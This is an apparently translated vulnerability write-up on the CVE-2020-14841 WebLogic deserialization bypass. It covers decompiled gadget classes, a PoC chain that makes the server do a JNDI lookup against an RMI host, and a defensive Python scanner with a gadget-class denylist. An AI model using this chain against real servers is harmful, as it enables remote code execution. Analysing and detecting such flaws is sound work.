This article walks through the analysis of the CVE-2020-14841 WebLogic JNDI injection bypass. The content is of good quality, so we share it for reference; after reading it you should have a working understanding of the relevant details.

By diffing the WebLogic deserialization blacklist in the upgrade package, we found that this class was newly added:

oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor
package oracle.eclipselink.coherence.integrated.internal.cache;

import com.tangosol.io.ExternalizableLite;
import com.tangosol.io.pof.PofReader;
import com.tangosol.io.pof.PofWriter;
import com.tangosol.io.pof.PortableObject;
import com.tangosol.util.ExternalizableHelper;
import com.tangosol.util.ValueExtractor;
import java.io.DataInput;
import java.io.DataOutput;
import java.io.IOException;
import oracle.eclipselink.coherence.integrated.cache.Wrapper;
import oracle.eclipselink.coherence.integrated.internal.querying.EclipseLinkExtractor;
import org.eclipse.persistence.mappings.AttributeAccessor;

public class LockVersionExtractor implements ValueExtractor, ExternalizableLite, PortableObject, EclipseLinkExtractor {
    protected AttributeAccessor accessor;
    protected String className;

    public LockVersionExtractor() {
    }

    public LockVersionExtractor(AttributeAccessor accessor, String className) {
        this.accessor = accessor;
        this.className = className;
    }

    // Invoked by Coherence whenever the extractor is applied to a value,
    // for example by ExtractorComparator while a PriorityQueue is ordered.
    public Object extract(Object arg0) {
        if (arg0 == null) {
            return null;
        } else {
            if (arg0 instanceof Wrapper) {
                arg0 = ((Wrapper) arg0).unwrap();
            }
            if (!this.accessor.isInitialized()) {
                this.accessor.initializeAttributes(arg0.getClass());
            }
            // The deserialized accessor decides which method is called on arg0.
            return this.accessor.getAttributeValueFromObject(arg0);
        }
    }

    // The ExternalizableLite / PortableObject read and write methods
    // were not part of the excerpt quoted here.
}
From the code we can see that this is similar to CVE-2020-2555, and it is used in the same way. The key to triggering the vulnerability is the call to this.accessor.getAttributeValueFromObject. Below we pick one possible execution path:
package org.eclipse.persistence.internal.descriptors;

import java.lang.reflect.Method;
import java.security.AccessController;
import java.security.PrivilegedActionException;
import org.eclipse.persistence.exceptions.DescriptorException;
import org.eclipse.persistence.internal.security.PrivilegedAccessHelper;
import org.eclipse.persistence.internal.security.PrivilegedMethodInvoker;
import org.eclipse.persistence.mappings.AttributeAccessor;

public class MethodAttributeAccessor extends AttributeAccessor {
    protected String setMethodName = "";
    protected String getMethodName;
    protected transient Method setMethod;
    protected transient Method getMethod;

    public Object getAttributeValueFromObject(Object anObject) throws DescriptorException {
        // No parameters are ever passed: only a no-argument getter can be invoked.
        return this.getAttributeValueFromObject(anObject, (Object[]) null);
    }

    protected Object getAttributeValueFromObject(Object anObject, Object[] parameters) throws DescriptorException {
        try {
            if (PrivilegedAccessHelper.shouldUsePrivilegedAccess()) {
                try {
                    return AccessController.doPrivileged(new PrivilegedMethodInvoker(this.getGetMethod(), anObject, parameters));
                } catch (PrivilegedActionException var5) {
                    Exception throwableException = var5.getException();
                    if (throwableException instanceof IllegalAccessException) {
                        throw DescriptorException.illegalAccessWhileGettingValueThruMethodAccessor(this.getGetMethodName(), anObject.getClass().getName(), throwableException);
                    } else {
                        throw DescriptorException.targetInvocationWhileGettingValueThruMethodAccessor(this.getGetMethodName(), anObject.getClass().getName(), throwableException);
                    }
                }
            } else {
                // Reflective call of the getter named by getMethodName on anObject.
                return this.getMethod.invoke(anObject, parameters);
            }
        }
        // The catch clauses that follow the try block were cut off in the original excerpt.
    }
}
The limitation of getAttributeValueFromObject in MethodAttributeAccessor is that it can only invoke methods that take no arguments. From that observation it is easy to connect it with CVE-2020-14645 from July.

So, following the same pattern, the PoC is as follows:
import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.util.comparator.ExtractorComparator;
import java.lang.reflect.Field;
import java.util.PriorityQueue;
import oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor;
import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;
// Reflections.setFieldValue is a reflection helper not shown in the post.

// JdbcRowSetImpl
JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
jdbcRowSet.setDataSourceName("rmi://192.168.3.254:8888/xsmd");

// Accessor configured to call the no-argument getter getDatabaseMetaData()
MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
methodAttributeAccessor.setGetMethodName("getDatabaseMetaData");
methodAttributeAccessor.setIsWriteOnly(true);
methodAttributeAccessor.setAttributeName("UnicodeSec");

// Same PriorityQueue / ExtractorComparator trigger as CVE-2020-2555 and CVE-2020-14645
LockVersionExtractor extractor = new LockVersionExtractor(methodAttributeAccessor, "UnicodeSec");
final ExtractorComparator comparator = new ExtractorComparator(extractor);
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);

Object[] q = new Object[]{jdbcRowSet, jdbcRowSet};
Reflections.setFieldValue(queue, "queue", q);
Reflections.setFieldValue(queue, "size", 2);

Field comparatorF = queue.getClass().getDeclaredField("comparator");
comparatorF.setAccessible(true);
comparatorF.set(queue, new ExtractorComparator(extractor));
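The chain above is only dangerous if every class in it is resolvable during deserialization, which is why the patch simply adds LockVersionExtractor to the blacklist. As an added example from the defender's side (not code from the original post, WebLogic or EclipseLink), the following Python scanner walks a Java serialization stream, pulls the class names out of its TC_CLASSDESC records and flags a stream that either names a denied class or carries the full PriorityQueue / ExtractorComparator / JdbcRowSetImpl marker set. The denylist, the marker set and the sample streams are constructed for this example; the samples contain only the stream magic and bare class-descriptor prefixes, not real serialized objects.

```python
import re
from dataclasses import dataclass
from typing import List

# Java serialization stream constants (java.io.ObjectStreamConstants)
STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_CLASSDESC = 0x72

# Constructed denylist for this example, modelled on the blacklist entry the
# post describes (LockVersionExtractor) plus the accessor it drives.
DENIED_CLASSES = {
    "oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor",
    "org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor",
}
# Harmless on their own; their co-occurrence is the trigger shape shared by
# CVE-2020-2555, CVE-2020-14645 and CVE-2020-14841 (constructed marker set).
CHAIN_MARKERS = {
    "java.util.PriorityQueue",
    "com.tangosol.util.comparator.ExtractorComparator",
    "com.sun.rowset.JdbcRowSetImpl",
}

# Fully-qualified Java class name: at least one package segment and a simple name.
CLASS_NAME = re.compile(rb"[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+")


def class_names(stream: bytes) -> List[str]:
    """Class names in the order their TC_CLASSDESC records appear.

    A new class descriptor is the byte 0x72 followed by a modified-UTF-8
    string: a two-byte big-endian length, then the name bytes. Once a
    descriptor matches, scanning resumes after the name so that 'r' bytes
    inside the name are not mistaken for further descriptors.
    """
    names = []
    i = 0
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            length = int.from_bytes(stream[i + 1:i + 3], "big")
            candidate = stream[i + 3:i + 3 + length]
            if len(candidate) == length and CLASS_NAME.fullmatch(candidate):
                names.append(candidate.decode("ascii"))
                i += 3 + length
                continue
        i += 1
    return names


@dataclass
class Verdict:
    suspicious: bool
    matched: List[str]


def inspect_stream(stream: bytes) -> Verdict:
    """Flag a stream that resolves a denied class or the whole marker set."""
    if not stream.startswith(STREAM_MAGIC):
        return Verdict(False, [])  # not a Java serialization stream at all
    found = class_names(stream)
    matched = [n for n in found if n in DENIED_CLASSES or n in CHAIN_MARKERS]
    denied_hit = any(n in DENIED_CLASSES for n in found)
    chain_hit = CHAIN_MARKERS.issubset(found)
    return Verdict(denied_hit or chain_hit, matched)


def class_desc(name: str) -> bytes:
    """Bare TC_CLASSDESC record for test data (constructed, not a real object)."""
    raw = name.encode("ascii")
    return bytes([TC_CLASSDESC]) + len(raw).to_bytes(2, "big") + raw


# Constructed sample streams, descriptors in the order the chain's objects
# would be written by ObjectOutputStream.
SAMPLE_GADGET_STREAM = STREAM_MAGIC + b"".join(class_desc(n) for n in [
    "java.util.PriorityQueue",
    "com.tangosol.util.comparator.ExtractorComparator",
    "oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor",
    "org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor",
    "com.sun.rowset.JdbcRowSetImpl",
])
SAMPLE_BENIGN_STREAM = (STREAM_MAGIC + class_desc("java.util.HashMap")
                        + class_desc("java.util.ArrayList"))

if __name__ == "__main__":
    for label, s in [("gadget", SAMPLE_GADGET_STREAM), ("benign", SAMPLE_BENIGN_STREAM)]:
        print(label, inspect_stream(s))
```

A byte scanner like this is a triage tool for captured T3 traffic or stored payloads, not a substitute for the server-side check: it does not follow TC_REFERENCE back-references or TC_PROXYCLASSDESC records, so the authoritative control remains a resolveClass-time denylist of the kind the WebLogic patch extends.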
That concludes the analysis of the CVE-2020-14841 WebLogic JNDI injection bypass. We hope the above is of some help and lets you learn a bit more. If you found the article useful, share it so that more people can see it.
Original link: https://www.freebuf.com/articles/web/252652.html